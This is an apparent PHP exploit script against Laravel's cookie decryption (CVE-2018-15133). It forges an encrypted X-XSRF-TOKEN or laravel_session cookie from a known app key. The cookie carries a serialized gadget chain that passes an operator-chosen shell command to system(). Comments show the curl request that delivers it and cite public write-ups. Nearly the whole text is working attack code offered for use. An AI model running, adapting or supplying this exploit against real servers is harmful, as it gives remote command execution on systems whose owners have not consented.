jzLt4pbs

1#!/usr/bin/env php
2<?php
3$API_key = "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="; //edit here to API Key of laravel
4$cmd = "ls -la"; // edit here to your command here !!
5$cmd_len = strlen($cmd);
6$payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . $cmd_len . ':"' . $cmd . '";}';
7$value = base64_encode($payload_decoded);
8
9$cipher = 'AES-256-CBC';
10$iv = random_bytes(openssl_cipher_iv_length($cipher));
11$value = openssl_encrypt(base64_decode($value), $cipher, base64_decode($API_key), 0, $iv);
12if ($value === false) {
13    exit("Could not encrypt the data.");
14}
15
16$iv = base64_encode($iv);
17$mac = hash_hmac('sha256', $iv.$value, base64_decode($API_key));
18$json = json_encode(compact('iv', 'value', 'mac'));
19if (json_last_error() !== JSON_ERROR_NONE) {
20    echo "Could not json encode data." ;
21    exit();
22}
23$encodedPayload = urlencode(base64_encode($json));
24echo "[+] Cookie: X-XSRF-TOKEN=" . $encodedPayload;
25// or
26//echo "[+] Cookie: laravel_session=" . $encodedPayload;
27// when you got Cookie let's exploit vuln
28// use curl command
29//curl -H "Cookie: laravel_session=eyJpdiI6Ill....TgxYyJ9;" http://<domain or IP>/
30// laravel vuln
31// here how to encrypt and decrypt with API_Key https://github.com/laravel/framework/blob/6.x/src/Illuminate/Encryption/Encrypter.php
32// when enc or dec it's serialize and unserialize
33// so we can exploit php object injection to create file or get RCE 
34// please check some Ref:
35// https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/
36// https://github.com/kozmic/laravel-poc-CVE-2018-15133